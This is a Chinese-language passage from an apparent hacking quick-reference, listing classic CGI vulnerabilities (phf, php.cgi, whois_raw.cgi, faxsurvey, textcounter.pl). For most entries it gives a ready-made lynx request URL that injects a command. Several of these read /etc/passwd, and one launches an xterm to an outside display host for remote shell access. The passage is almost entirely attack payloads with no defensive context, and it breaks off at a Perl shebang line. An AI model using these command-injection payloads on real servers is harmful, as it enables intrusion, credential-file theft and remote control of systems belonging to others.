3.5 CGI及系统漏洞速查(1)

    

3.5  CGI及系统漏洞速查

● phf漏洞

漏洞介绍：phf漏洞是最经典了，可以通过浏览器执行服务器的命令来查找，如下     所示：

/etc/passwd

lynx  http://server/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd   

● php.cgi 2.0beta10或更早版本的漏洞

漏洞介绍：可以读nobody权限的所有文件。

lynx  http://server/cgi-bin/php.cgi?/etc/passwd

注意：

php.cgi 2.1版本的只能读shtml文件，但对于密码文件可能在/etc/master.passwd、/etc/security/passwd路径下。

● whois_raw.cgi

lynx  http://server/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd

lynx

http://server/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0

● faxsurvey

lynx  http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

● textcounter.pl

漏洞介绍：如果服务器上有textcounter.pl，所有人可以以http守护进程的权限执行    命令。

#!/usr/bin/perl